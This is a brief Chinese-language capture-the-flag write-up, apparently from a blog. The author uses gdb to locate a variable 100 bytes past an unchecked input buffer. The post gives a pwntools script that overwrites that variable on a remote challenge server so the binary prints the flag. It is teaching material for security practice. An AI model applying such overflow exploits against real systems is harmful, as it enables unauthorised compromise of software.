-->
存在flag的直接输出
gdb调试
0x31313131为我输入的文本
0x00000315是存储v5的地方
没有溢出检测那就直接覆盖掉
数了数中间差了25个单位
编写exp
from pwn import* #p=process("/wowotou") p=remote("183.129.189.60",10020) p.sendline('1'*25*4+p32(4)) p.interactive()
获得flag
上一篇:[WP] 河北师范大学信息安全挑战赛 印证血统的时候到了
下一篇:[WP] NJUPT CTF 2019
名称(*)